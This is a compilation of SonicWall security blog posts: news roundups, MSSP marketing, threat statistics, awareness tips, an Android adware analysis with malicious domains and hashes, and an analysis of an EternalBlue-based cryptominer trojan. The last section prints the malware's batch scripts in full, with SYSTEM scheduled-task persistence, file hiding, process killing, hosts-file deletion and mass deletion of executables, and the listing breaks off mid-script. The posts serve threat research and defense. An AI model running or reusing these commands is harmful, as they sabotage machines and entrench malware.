Cyber Security News & Trends

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

10 Security Advances That Could Change the Game  – Channel Partners Online

  • SonicWall’s Lawrence Pingree shares his perspective on the need for rapid chip augmentation in order to successfully combat the cybersecurity war in 2019.

SonicWall and Partners Take Part at GITEX Technology Week – Tahawul Tech

  • SonicWall is a major presence at GITEX Technology Week, one of the biggest technology events in the world.

How Cyberhardening Can Reduce Risk to the Entire Medical Community – Beckers Hospital Review

  • Data from SonicWall’s Capture Labs is used to help show just how much data in the medical industry is vulnerable to cyberattack.

Cyber Security News

Facebook Finds Hack Was Done by Spammers, Not Foreign State – The Wall Street Journal

  • Facebook thinks that spammers looking to make money through advertising, and not a nation-state, are responsible for a recent data breach involving the data of 30 million accounts.

The Mysterious Return of Years-Old Chinese Malware – Wired

  • A modified version of malware dating back to 2010, that has never been made public and is not known to have been sold on the black market, has had a mysterious resurgence in recent months.

Pentagon Discloses Card Breach – ZDNet

  • Only a week after reporting that it was struggling to meet the demands of cyberwarfare, the Pentagon confirms that a security breach affecting up to 30,000 personnel was discovered at the start of October this year.

UK Firms “Not Prepared” for Data Breaches – Tech Radar

  • It’s not just U.K. firms. According to a report released for European Cybersecurity Month. one in six European businesses are not prepared for a cyberattack, even though over a third of them have suffered from a data breach in the past year.

Zero-Days, Fileless Attacks Are Now the Most Dangerous Threats to the Enterprise  – ZDNet

  • According to a study conducted by the Ponemon Institute, the average cost of a successful endpoint-based attack has increased by roughly 42 percent year-on-year with the average organization losing over $7 million.

New Cyberdefenses to Protect Your Smart Appliances From Hackers – The Wall Street Journal

  • A partnership was announced between U.K. based chip-designers Arm and Boston-based cybersecurity firm Cyberreason; they aim to develop secure chip designs specifically protecting Internet of Things (IOT) devices from cyberattack.

Report: Cryptocurrency Exchanges Lost $882 Million to Hackers – Bank Info Security

  • Cryptocurrency exchanges continue to suffer from successful cyberattacks and a newly released study has tallied the damages at $882 million in the past two years, this is only expected to get worse in 2019.

In Case You Missed It

3 Elements of a Successful Managed Security Services (MSS) Bundle

The small- and medium-sized business (SMB) market is rapidly accelerating its adoption of converged managed IT services to alleviate headaches and prevent risks.

More and more businesses use cloud-based services for enterprise applications, processing or communications, placing an even higher priority on network performance and reliability. Yet many SMBs are facing a cybersecurity crisis.

Cyber threats are continuing to get more sophisticated and frequent; SMBs are becoming a more routine target. 61 percent of SMBs experienced a cyber breach in 2017, compared to 55 percent in 2016.

Most managed IT service providers recognize that SMBs don’t have the awareness, knowledge or resources to implement cyber defense mechanisms to effectively protect their data, devices and people. Furthermore, the cybersecurity services market has developed enterprise-class solutions aimed at large enterprise businesses because they have historically been prime targets.

“The challenge for MSPs is finding effective tools that pair well with internal processes to mitigate the risk of a cyber breach, threat of downtime or damage to customers’ reputation.”

There are incredible opportunities for MSPs to develop service options customized for SMBs to address cybersecurity woes while accommodating limited budgets. MSPs that are focused on this will continue to add real value to the services they are providing and strengthen customer relationships by building trust.

The challenge for MSPs is finding effective tools that pair well with internal processes to mitigate the risk of a cyber breach, threat of downtime or damage to customers’ reputation. If bundled intelligently, these services are any easy sell. No business owner wants to see their organization featured on the six o’clock news for a data breach.

Consider three foundational elements of an MSSP plan. These may consist of several individual services, but those services are aimed at protecting specific functions.

Data Protection

Just like their enterprise counterparts, small businesses have a growing data footprint. Storage keeps getting less expensive and many SMBs don’t have a data governance policy, causing the gigabytes to pile up.

Whether the data is stored on-premises or in the cloud, it’s important to have appropriate protections in place, but also the ability to restore data in the event of a disaster or cyberattack. Good MSSP bundles aimed at protecting data will include:

  • Content Filtering: Having a web filtering service to block inappropriate, unproductive or malicious websites is a major first step in preventing cyberattacks.
  • Email Security: Implement secure email solutions to protect SMBs from email-borne threats, such as ransomware, zero-day attacks and spear-phishing attempts, and comply with regulatory mandates to encrypt sensitive emails.
  • Backup & Disaster Recovery: Ensure that an SMB’s data is effectively backed up; whether it lives on a workstation, on-premises device or in the cloud. Being able to restore information that has been compromised is the best insurance policy.

Device Protection

Endpoint devices come in all shapes, sizes and flavors, but the quantity of devices continues to grow. This means that there are more potential intrusion points than ever before. It’s important for a good MSSP bundle to include services aimed at protecting and monitoring endpoint devices.

  • Endpoint Management: MSSPs should have a comprehensive inventory of all devices associated with an SMB customer. Good endpoint management solutions will allow MSSPs to push updates and security patches as they are released to ensure that endpoints stay hardened.
  • Endpoint Security: It almost goes without saying, but having a solid antivirus endpoint security solution in place is still one of the best defenses for protecting endpoint devices.
  • Endpoint Rollback: Mistakes happen. Phishing emails are opened. Malicious links are clicked. But MSSPs can add value for their customers by using endpoint protection solutions that include automated rollback features for those events when a device is compromised.

People Protection

The human element is the most difficult to control and the hardest to protect. But it is critical.

Provide convenient and easy pathways for people to adopt sound security behavior. A consistent security awareness culture makes it easier for users to be aware of security threats. Consider the following bundled services as part of your MSSP offering.

  • Virtual Private Network (VPN): Provide a secure lane for all SMB endpoints to work over a VPN connection. A VPN client may route back to the customer’s network if there are on-premises connectivity demands, or it may be more generic VPN connection to an MSSP’s gateway. VPNs are prevalent and not just for workstations anymore. Modern VPN services offer clients for just about any type of endpoint and are especially important for mobile devices.
  • Policies & Procedures: Provide template policies and procedures to your SMB customers. Again, many of them are leaving IT management, including governance, up to you. Providing basic templates for things like password management, backup and user provisioning is an easy way to get them to create a more robust security awareness culture.
  • Security Awareness Training: For SMBs that subscribe to your MSSP bundle, provide them with routine threat awareness and simple tips and tricks to enforce that security awareness culture.

The most effective MSSP program is dependent on partnerships. Partnerships between SMBs and their IT partners, but also partnerships between MSSP providers and solutions providers. MSPs that bundle services to offer an MSSP will be well-suited to work with security vendors able to offer a comprehensive spectrum of services for their SMB customers.

About ProviNET

ProviNET is a SonicWall SecureFirst Gold Partner. For nearly three decades, ProviNET has delivered trusted technology solutions for healthcare organizations. Whether it’s a single project or full-time onsite work, ProviNET designs and implements customized solutions so healthcare organizations can focus on core services.

ProviNET’s tight-knit group of experienced, industry-certified personnel are focused on customer satisfaction. They are a reputable organization, fulfilling immediate IT needs and helping plan for tomorrow. They are ready to put their extensive knowledge to work for healthcare, developing strategies and solving challenges with the latest technology.

To learn more about ProviNET, please visit www.provinet.com.

September 2018 Cyber Threat Data: Ransomware Threats Double Monthly, Encrypted Threats Still Growing

We’re into October and based on this year’s reports so far, the threat landscape is continuing to evolve and change as the global cyber arms race grows.

Phishing attacks continue to trend downwards, with September data showing the volume of attacks down 92 percent compared to the same time last year. The reasons for this decline are not 100 percent clear, but may be partly attributed to increased awareness as people are becoming more adept at identifying phony websites and sharing information about common scams.

While phishing is still a threat, particularly as the holiday season approaches, it appears that cyber criminals are continuing to favor attacks involving malware, ransomware, TLS/SSL encrypted attacks and intrusion attempts. SonicWall Capture Advanced Threat Protection sandbox, with Real-Time Deep Memory Inspection (RTDMITM), has discovered 27,680 new attack variants this year, further evidence that cyber criminals are pursuing more sophisticated and coordinated methods of attack.

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through September 2018:

  • 8.5 billion malware attacks (54 percent increase from 2017)
  • 2.9 trillion intrusion attempts (49 percent increase)
  • 262.4 million ransomware attacks (108 percent increase)
  • 1.9 million encrypted threats (56 percent increase)

In September 2018 alone, the average SonicWall customer faced:

  • 1,662 malware attacks (24 percent decrease from July 2017)
  • 791,015 intrusion attempts (19 percent increase)
  • 56 ransomware attacks (99 percent increase)
  • 70.9 encrypted threats (61 percent decrease)
  • 10 phishing attacks each day (92 percent decrease)

 SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about so they can design and test their security posture ensure their networks, data, applications and customers are properly protected.

Get the Mid-Year Update

Dive into the latest cybersecurity trends and threat intelligence from SonicWall Capture Labs. The mid-year update to the 2018 SonicWall Cyber Threat Report explores how quickly the cyber threat landscape has evolved in just a few months.

Workplace Cybersecurity Is Everyone’s Responsibility

The cyberthreat landscape is changing. An increasing number of cyberattacks are executed using sophisticated tactics. Earlier this year, SonicWall warned that malware volume increased 102 percent in the first half of 2018 compared to that of 2017.

The report also notes a significant increase in cyberattacks that leverage new variants of malware, including ransomware and encrypted threats. Further, attacks are becoming highly targeted, for example baseStriker and PhishPoint target Office 365 users.

Attackers are evolving to take advantage of workplace technology trends, including the cloud and BYOD. These trends empower workforces to be mobile and productive as demanded by today’s 24/7 hyper-connected reality. Unfortunately, these behavior changes are significantly expanding the attack surface area for cybercriminals to exploit.

“Attackers are evolving their tactics to take advantage of workplace technology trends, including the cloud and BYOD.”

Today, network security means more than just safeguarding data, applications and infrastructure. Employees are not only resources that need protection, but also weaknesses or valuable assets for a stronger cybersecurity posture.

It is, of course, essential for organizations to have necessary security in place to monitor and protect attack surface areas. But no security product can be a silver bullet to stop all cyberattacks. It is necessary to educate and empower the last and most crucial line of defense: your employees.

Build a Culture of Cybersecurity Awareness

Employees are a key resource for an organization. As driving revenue is the primary objective, safeguarding the organization must also become one of the main responsibilities for employees. With the right frameworks and security awareness training programs in place, they can also be an effective layer of defense — a human firewall.

By extending these responsibilities to all employees, organizations can prevent sophisticated cyberattacks, saving the organization from financial, legal and reputation damages.

Creating cybersecurity awareness and training programs must include what employees must be aware of, what they need to watch out for, what best practices should be leveraged and how to follow them. It also must be easy to report security incidents. These programs must be delivered efficiently, measured and be easy to use.

Since the cyber threat landscape is evolving, the “human firewall” needs continuous signature/intelligence updates in terms of the new threats and how to identify and stop them. This is modern cybersecurity awareness.

Stop the No. 1 Cyberattack Vector: Email

But cybercriminals also know to target the human element to execute attacks. Email is the No. 1 threat vector used by cybercriminals today; more than 90 percent of attacks start with a phishing campaign.

Modern phishing tactics can trick even the savviest users. Attacks that use fake login pages, impersonation and business email compromise (BEC) are difficult to detect and block as these emails do not contain malware.

Organizations would benefit from taking a human-centric approach to email security and include user training and awareness to spot and avoid clicking on phishing email threats. Organizations should train employees to:

Embrace security as one of their key responsibilities.Beware of sudden changes in business practices. For example, email requests for transfers of funds.
Treat any suspicious email with caution.Review the signature and legitimacy of the request.
Look at domain names from suspicious emails.Confirm requests for transfers of funds or confidential information, such as W-2 records.
Exercise extra caution if an email is from a free, web-based account.Do not use the “Reply” option to respond to any business emails. Instead, use the “Forward” option and either type in the correct email address or select it from the email address book to ensure the intended recipient’s correct email address is used.
Check for spelling mistakes and grammatical errors.

Spot Sophisticated Phishing Attacks

Want to brush up on your ability to spot a phishing attack? Take SonicWall’s quick Phishing IQ test or download our exclusive brief, “How to Stop Email Spoofing.”

Monitor and Manage Shadow IT

According to Gartner, by 2020 one-third of security breaches will be the result of shadow IT. The ease of SaaS adoption and deployment leads to the following problems:

  • Losing control over sensitive corporate data traversing through public or hybrid clouds and data centers introduces new risks such as unauthorized access, malware propagation, data leakage and non-compliance.
  • Balancing security budgets, shadow IT practices and employee productivity.

To address the above challenges, IT administrators need Cloud Access Security Broker (CASB) solutions to provide visibility for what applications are being used and where. This will help them better understand the overall risk posture.

To mitigate the risks of shadow IT and embrace productivity, both organizations and employees must understand the agreement on what constitutes a legitimate application allowed for official use. Employees must be trained to use judgement so that they do not upload sensitive or confidential data into cloud-based applications.

Protect Endpoints, Especially When Outside the Perimeter

Workforces today rely on the same device for business and personal use, resulting in intermingling of business and personal data and applications. This creates an increased risk of security breaches for organizations, including:

  • Unauthorized users gaining access to company data and applications
  • Malware-infected devices acting as conduits to infect company systems
  • Interception of company data in transit on unsecured public Wi-Fi networks
  • Compliance with audit and regulatory requirements
  • Loss of business data stored on devices if rogue personal apps or unauthorized users gain access to data

To ensure proper safety, employees must be educated on the risks an endpoint poses to an organization, especially when those devices are frequently used from home, mobile or public networks. This can start with the basics such as:

  • Lock mobile devices when not in use.
  • Don’t use USB drives you don’t trust.
  • Update all software, operating systems and malware signatures.
  • Use secure VPN connections when accessing corporate resources over unsecured networks.
  • Install next-generation anti-virus (NGAV) to stop the latest threats.

Cybersecurity: Our Shared Responsibility

As cyberattacks evolve, organizations need to take a human-centric approach to security. Cybersecurity is everyone’s job. It’s a shared responsibility. It’s critical that structures, guidelines and processes are in place to make employees care and be responsible to remain safe online while at work.

Organizations will greatly benefit by incorporating user awareness and training programs to educate and empower employees who will form a critical line of defense. Cybersecurity is never finished. Make it core to company culture.


About Cybersecurity Awareness Month

The 15th annual National Cybersecurity Awareness Month (NCSAM) highlights user awareness among consumers, students/academia and business. NCSAM 2018 addresses specific challenges and identifies opportunities for behavioral change. It aims to remind everyone that protecting the internet is “Our Shared Responsibility.”

In addition, NCSAM 2018 will shine a spotlight on the critical need to build a strong, cyber secure workforce to help ensure families, communities, businesses and the country’s infrastructure are better protected through four key themes:

  • Oct. 1-5: Make Your Home a Haven for Online Safety
  • Oct. 8-12: Millions of Rewarding Jobs: Educating for a Career in Cybersecurity
  • Oct. 15-19: It’s Everyone’s Job to Ensure Online Safety at Work
  • Oct. 22-26: Safeguarding the Nation’s Critical Infrastructure

Learn more at StaySafeOnline.org.

Panini Adware for Android soaks network bandwidth, bad news for users with limited data

SonicWall Capture Labs Threats Research Team has been observing an Android adware that spreads using different app names and icons, this adware does not ask for a plethora of permissions (like most malware) and its network activity typically starts after it downloads a jar file after few minutes of execution. Upon further investigation we found more than 500+ samples that exhibit this behavior from the last two months alone indicating that this campaign is very active in the wild. We named this adware campaign Panini because of the filename of the jar file that gets downloaded.

Most of these samples use generic and simple app names such as Video, Downloader and Music; we have been tracking samples belonging to this campaign for a while and below is a chart that shows the breakup of different app names used by samples belonging to this campaign that we analyzed:

 

As visible above, the app names are fairly generic in nature and might have been chosen to keep the adware hidden in the crowd of Android apps with unique and attractive app names.

Birds of the same feather

There are few similarities among the different samples belonging to this campaign:

Code structure

Below is a comparison of code structure from 3 different samples with different app and package names belonging to the Panini Adware campaign:

List of permissions

All of the samples belonging to this campaign request for the following permissions:

  • android.permission.INTERNET
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.WRITE_EXTERNAL_STORAGE

Similar folder structure from the install location

The folder structure on the device post-installation is same for all the samples from this campaign:

Icons being used

All the samples belonging to this campaign use icons from the following set, these set of icons are present in every sample in the resource folder mipmap-xxhdpi-v4:

Icon mind games

For apps belonging to this campaign, the icon that gets displayed in the app drawer post installation is different from what appears before installation.
Example – For apk com.cradiff.devilfighter (MD5 – c43a22306e1f34bd7ed59f5272e2012b) the icon that appears for this apk is:

Post installation the icon visible in the app drawer is different:

Most likely, the reason for this might be the fact that a user notices a new icon in the app drawer and might click on the new icon out of curiosity to find out when he installed this new app/what this app is about. This is a clever tactic that makes the victim open the app and thereby execute the adware.

We found a folder – mipmap-xxhdpi-v4 – within the resources folder for the apk that contains icons for most of the samples belonging to this campaign:

The icons are shown (from the list above) based on what is coded in the Android Manifest.xml file:

Once the adware begins execution, the icon disappears from the app drawer. If the victim tries to remove this app from settings he would see a different icon than the one that appeared in the app drawer. This is most likely a ploy to confuse the victim when he tries to uninstall the apk:

Permissions

Apps belonging to this campaign request for the following permissions:

  • android.permission.INTERNET
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.WRITE_EXTERNAL_STORAGE

Among these permissions the only dangerous permission is its request to write data to external storage. Usually malware tend to request for a number of normal and dangerous permissions and based on the permission usage we can often determine the behavior of the malware. Considering the only permission requested by this adware is the ability to write to an external storage, we can fairly assume there will be some sort of file that gets downloaded.

That is exactly what happens once the adware begins execution.

After a few minutes of execution the adware initiates a GET request for a jar file named romanticpanini [Blocked by GAV: JScript.A_161 (Trojan) ]:

The Panini

The file romanticpanini is saved locally in the folder app_extra:

Once the jar file is saved, the network activity on the device multiplies and we start seeing heavy advertisement related traffic, soon enough we saw full screen advertisements pop up regularly on our infected device:

We measured the network traffic in different test conditions and observed a sharp rise in network traffic originating from the adware samples. We ran the test for 10 minutes after an adware sample is installed and executed on the device.

On average we saw data consumption of close to 5MB post infection (as shown in the image below). This does not bode well for users who have limited/capped data plans on their devices as additional data consumption leads to extra charges on the mobile phone bill.

Adware Domains

Every sample from this campaign contains a hardcoded domain, few domains that we encountered during our analysis of Panini adware are:

  • cdn.mobengine.xyz
  • ccthi.enconfhz.com
  • first.luckshery.com
  • cthi.nconfhz.com
  • three.nameapp.xyz
  • api.jetbudjet.in
  • api.mobengine.xyz
  • con.rsconf.site
  • one.nameapp.xyz
  • get.confhz.space
  • mi1k.io

VirusTotal URL scan of one of the domains – cdn.mobengine.xyz – revealed another jar file that is hosted on this domain along with romanticpanini – stealmaggot4.jar:

The image above additionally shows different apps that harbor this campaign.

Distribution

The apps belonging to this campaign use different package and app names, among the samples we observed for the last few weeks few package names repeated a number of times. A quick search on the Android malware collaboration portal Koodous gives us results for a high number of samples from this campaign, below image shows the number of results for apps with a particular package name:

 

Below image shows the geographical distribution of the hits for the signatures belonging to this campaign:

 

Conclusion

Traditionally adware has always fallen in the grey area in terms of calling them malicious/blocking them. Most of the times they do not pose a risk towards user’s data and privacy like traditional malware but are more of a ‘nuisance’ when they pop full-screen ad’s and/or consume large amounts of data. The Panini adware campaign falls under the same umbrella where it poses a risk in terms of  data consumption. This particularly hits users who use a mobile plan with restricted data limits, for users with unlimited data plans usually the data speeds reduce once a particular limit is reached so they are affected as well.

It is a good habit to routinely check the network data consumption on our devices. Running a routine check using Network Monitoring apps can give an idea if a particular app is consuming a lot of network data and can potentially uncover an adware on the device.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOS.Panini.AD (Trojan)
  • GAV: AndroidOS.Panini.AD_2 (Trojan)
  • GAV: JScript.A_161 (Trojan)

Below are few samples belonging to this campaign:

  • 778e132ed56527e775fb9029603968c3 – com.AUTORUS.RetroDrag
  • 89a7e6a607be86c702b6f4a1126f5002 – com.AUTORUS.RetroDrag
  • 215de7aab595fb4bb2d41faa555dc467 – com.AUTORUS.RetroDrag
  • c43a22306e1f34bd7ed59f5272e2012b – com.cradiff.devilfighter
  • a359526b2c7ae82c25d1182ea583cea5 – com.cradiff.devilfighter
  • 791adeb47a81a94e50e84bb5c78a21d3 – com.cradiff.devilfighter
  • b3ead04496567b171be4953ba20f90ce – com.cradiff.devilfighter
  • 927bac83d1c8df5dd160d6687fe8cc40 – com.cradiff.devilfighter
  • ab4483a82c1bbe3022c935b36cf38ba3 – com.cradiff.devilfighter
  • 49e0bb2f5347693b897a212615973e0a – com.cradiff.devilfighter
  • 8a23ad4b9777319a08e8b68a3c99bdab – com.cradiff.devilfighter
  • 4778de1b22cf844dd182fa062013b5b7 – com.cradiff.devilfighter
  • 74515dc638dd0ba76ea0513e1c026767 – com.cradiff.devilfighter
  • 9d355e11199335beeeec6267ff47a995 – com.gameloft.android.GAND.GloftM3HP
  • 0c99a2cb99e946b3cac401fce4619d65 – com.gameloft.android.GAND.GloftM3HP
  • ee641d3491110767edba029527c63200 – com.herocraft.game.free.gibbets2
  • aa98977c4360c04d5b0f9f63b314076a – com.movinapp.dict.enit.free
  • 7a2d3c11965e676d926091ffec9f36f5 – com.movinapp.dict.enit.free
  • 5816d134ea058d5ec30f5760ea19cb39 – com.movinapp.dict.enit.free
  • cae85059276a70c436942f2b4dc7aec4 – ch.nth.android.contentabo_l01_sim_univ
  • 2d8eaf4c9b20810166fc216ee4558e56 – ch.nth.android.contentabo_l01_sim_univ
  • 341188b0810d2943dfa0f419fd3d66ef – com.pnr.engproverbsandsayings
  • b8dd1dd5aa2e73cdf90880ea2211a565 – com.pnr.engproverbsandsayings
  • 867f97568eb4ff260c679a6f51508372 – com.pnr.engproverbsandsayings
  • 0b734a3f4d934b0859aa0e65733bd99f – com.pnr.engproverbsandsayings
  • 789d63e0d80c31c99b412b01ee460578 – com.tedrasoft.enigmas
  • a78befd074b562e94655cd76c6d82dc7 – com.tedrasoft.enigmas
  • 53a3415d888966d2efc8d6d4b5a8faec – com.tedrasoft.gravity.pipes
  • d305b2a8107a253f0a4cfbe5a381d120 – com.zddapps.beststatus

Protecting Your MSSP Reputation with Behavior-Based Security

You’ve been here before. Your customer gets hit by a cyberattack and they ask, “Why did this happen? Shouldn’t your managed security service have protected us?”

Unless you give them a satisfactory answer, they may be shopping for a new partner. Over the past few years, I’ve heard several MSSPs having to explain to their customers that the malware or ransomware attack could not be stopped because they didn’t possess the technology that could mitigate new attacks.

Don’t put yourself in a situation where you can’t properly safeguard your customers — even against new or unknown attacks. To protect both your customers and your reputation against the latest threats, you need to deploy behavior-based security solutions that can better future-proof your customer environment.

The Logistics of Threat Prevention

When talking with people about threat prevention I ask, “How many new forms of malware do you think SonicWall detected last year?”

I usually hear answers in the thousands. The real answer? 56 million new forms or variants of malware in a single year. That’s more than 150,000 a day. Every day, security companies like SonicWall have teams of people creating signatures to help build in protections, but this takes time. Despite the industry’s best effort, static forms of threat elimination are limited.

Layering Security Across Customer Environments

MSSPs understand the importance of selling perimeter security, such as firewalls and email security, to scrub out most threats. These solutions will cover roughly 94-98 percent of threats. But for the smaller percentage of threats that are no less devastating, this is where behavior-based solutions come into play.

On each edge-facing firewall and email security service you need to have a network sandbox, which is an isolated environment where files can be tested to understand their intended purpose or motive. For example, the SonicWall Capture Advanced Threat Protection (ATP) sandbox is an isolated environment that is designed to run suspicious files in parallel through multiple engines to resist evasive malware. With the ability to block a file until a verdict has been reached, you can ensure that you will deliver highly vetted and clean traffic to end users.

Endpoints require a form of security that continuously monitor the system for malicious behavior because they roam outside the network perimeter and encounter fileless threats that come from vectors like malvertising.

SonicWall’s endpoint security solution (called Capture Client) only uses roughly 1 percent of the CPU’s processing power on a standard laptop. It can stop attacks before they happen as well as halt attacks as they execute. MSSPs love the ability to prevent dynamic attacks but also roll them back (on Windows only) in case they do initiate.

Behavior-based Security in Action

The power of behavior-based security was clear with the initial WannaCry attack in 2017. It was made famous when 16 NHS hospitals in the UK were shut down due to this viral ransomware attack. These sites were protected by a competitor whose CEO had to explain himself and apologize on national television.

The sites protected by SonicWall were up and running and helped pick up the slack when the others went down. Three weeks before the attack, SonicWall put protections in place that prevented Version 1 of WannaCry and its SMB vulnerability exploit from working.

But it was the behavior-based security controls that helped to identify and stop all the subsequent versions that came after. This same pattern emerged again with the NotPetya and SamSam ransomware attacks; static defenses followed by proactive dynamic defenses.

Furthermore, SonicWall’s reporting enables MSSPs to be alerted when something has been stopped. SonicWall Capture Client attack visualization gives administrators a view of where the threat came from and what it wanted to do on the endpoint.

This approach gives our customers — and MSSPs powered by SonicWall — the ability to protect against threats detected by SonicWall. But this strategy also protects against attacks that shift and change to bypass safeguards. By doing our best to build protections in a timely manner, as well as providing technology that detects and stops unknown attacks, we protect your customer as well as your reputation.


This story originally appeared on MSSP Alert and was republished with permission.

Trojan uses EternalBlue to install cryptominer

Interest in cryptocurrencies has not wavered despite a period of sinking market values. Cybercriminals are still ramping up efforts to obtain Blockchain assets in the hopes that their values could spike back up again in the future. While ransomware is still around, we have observed that cryptocurrency mining is increasingly being favored by cybercriminals as a method of choice in obtaining these cryptocurrencies. The premise is fairly simple- a machine gets infected by malware which stealthily uses its processing power to mine cryptocurrencies.

This week, the SonicWall Capture Labs Threat Research team has come across another Trojan that uses the leaked NSA exploit, EternalBlue, to install a cryptominer. This cryptominer even kills other known cryptomining processes that might be running on the victim’s machine to ensure exclusivity of the mining resource.

Infection Cycle:

The main installer uses the following icon pretending to be a Chinese Security product from 360.cn.

Upon execution, it creates a directory named “IIS” within the %Windir% folder and drops several files including a suite of the NSA exploit based hack tools:

  • %Windir%\IIS\CPUInfo.exe
  • %Windir%\IIS\Doublepulsar-1.3.1.exe
  • %Windir%\IIS\Esteemaudit-2.1.0.exe
  • %Windir%\IIS\Esteemaudittouch-2.1.0.exe
  • %Windir%\IIS\Eternalblue-2.2.0.exe
  • %Windir%\IIS\Eternalchampion-2.0.0.exe
  • %Windir%\IIS\free.bat
  • %Windir%\IIS\demo.bat
  • %Windir%\IIS\demc.bat
  • %Windir%\IIS\x86.dll
  • %Windir%\IIS\x64.dll

CPUInfo.exe uses the following icon. This file is used to determine if the machine is vulnerable and use the appropriate hacktool to then install either x86.dll or x64.dll depending on the type of processor of the file system.

To ensure persistence, Demo.bat is executed to add scheduled tasks on the Task Scheduler adding CPUInfo.exe as a scheduled task named “GooglePinginConfigs.


sc config Schedule start= auto
sc start Schedule
schtasks /delete /tn RavTask /f
schtasks /delete /tn GooglePinginConfigs /f
@schtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f
@schtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\RavTask.job
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job
schtasks /run /tn "RavTask"
del %0

Demc.bat is then executed which terminates known (possibly rival) cryptominers and performs a slew of other malicious procedures as a way of taking over the machine which includes the following:

  • Denying access to ftp.exe using access controls and taking ownership of it
  • Deleting the hosts file
  • Clearing the DNS cache
  • Stop and deleting services
  • Deleting all EXE files in the %ProgramFiles% directory

@wmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate
@md "C:\program files (x86)\stormii\server.exe"
echo y|cacls "C:\program files (x86)\stormii\server.exe" /d everyone
attrib +s +h +r +a "C:\program files (x86)\stormii"
echo y|cacls "C:\program files (x86)\stormii" /d everyone
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\program files (x86)\\windows nt\\conhost.exe'" call Terminate
@del /s /q "C:\program files (x86)\windows nt\conhost.exe"
@sc delete SuperProServerST
taskkill /f /t /im ftp.exe
takeown /f %SystemRoot%\SysWOW64\ftp.exe /a
takeown /f %SystemRoot%\System32\ftp.exe /a
echo y|cacls %SystemRoot%\System32\ftp.exe /g users:f
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /g users:f
del %SystemRoot%\System32\ftp.exe
del %SystemRoot%\SysWOW64\ftp.exe
md %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\System32\ftp.exe
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /d everyone
echo y|cacls %SystemRoot%\System32\ftp.exe /d everyone
takeown /f %systemroot%\system32\Drivers\etc\hosts /a
echo y|cacls %systemroot%\system32\Drivers\etc\hosts /g users:f
attrib -s -h -a -r %systemroot%\system32\Drivers\etc\hosts
del /s /q %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 localhost>>%systemroot%\system32\drivers\etc\hosts
attrib +s +h +a +r %systemroot%\system32\Drivers\etc\hosts
@ipconfig /flushdns
@attrib -h -r -s -a C:\ProgramData
taskkill /f /t /im CPUInfo.exe
taskkill /f /t /im up.exe
taskkill /f /t /im block.exe
taskkill /f /t /im cpu.exe
@taskkill /f /t /im svshostr.exe
@sc stop xtfya
@sc delete xtfya
@sc stop "Network Support"
@sc delete "Network Support"
@sc stop "HomeGroup Support"
@sc delete "HomeGroup Support"
@sc stop xtfy
@sc delete xtfy
@sc stop Natioanl
@sc delete Natioanl
@sc stop Natihial
@sc delete Natihial
@sc stop "Interactive Services Detection Report"
@sc delete "Interactive Services Detection Report"
@sc stop "mssecsvc2.0"
@sc delete "mssecsvc2.0"
@sc stop "mssecsvc2.1"
@sc delete "mssecsvc2.1"
@sc stop ServiceMais
@sc delete ServiceMais
@sc stop ServiceMaims
@sc delete ServiceMaims
del /f /s /q %ProgramData%\*.exe
rd /s /q %ProgramData%\dll
md %ProgramData%\dll
attrib +s +h +r %ProgramData%\dll
echo y|cacls %ProgramData%\dll /d everyone
del /f /s /q C:\Progra~1\dll
md C:\Progra~1\dll
attrib +s +h +r C:\Progra~1\dll
echo y|cacls C:\Progra~1\dll /d everyone
md c:\wax.exe
attrib +s +h +r c:\wax.exe
echo y|cacls c:\wax.exe /d everyone
@echo y|cacls C:\ProgramData\Natihial\svshostr.exe /d everyone
@echo y|cacls C:\ProgramData\Microsoft\Natihial\cmd.exe /d everyone
echo y|cacls C:\ProgramData\expl0rer.exe /d everyone
@echo y|cacls C:\windows\svchost.exe /d everyone
@Wmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate
@schtasks /delete /tn "Adobe Flash Player Updaters" /f
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\dll\\svchost.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\dll\\csrss.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\Natioanl\\svchostr.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\Natioanl\\csrss..exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\nm\\winlogin.exe'" call Terminate
md %SystemRoot%\svchost.exe
attrib +s +h +r %SystemRoot%\svchost.exe
echo y|cacls %SystemRoot%\svchost.exe /d everyone
taskkill /f /t /im tasksche.exe
md %SystemRoot%\tasksche.exe
attrib +s +h +r %SystemRoot%\tasksche.exe
echo y|cacls %SystemRoot%\tasksche.exe /d everyone
taskkill /f /t /im srvany.exe
md %SystemRoot%\srvany.exe
attrib +s +h +r %SystemRoot%\srvany.exe
echo y|cacls %SystemRoot%\srvany.exe /d everyone
taskkill /f /t /im WUDHostServices.exe
md %SystemRoot%\System32\WUDHostServices.exe
attrib +s +h +r %SystemRoot%\System32\WUDHostServices.exe
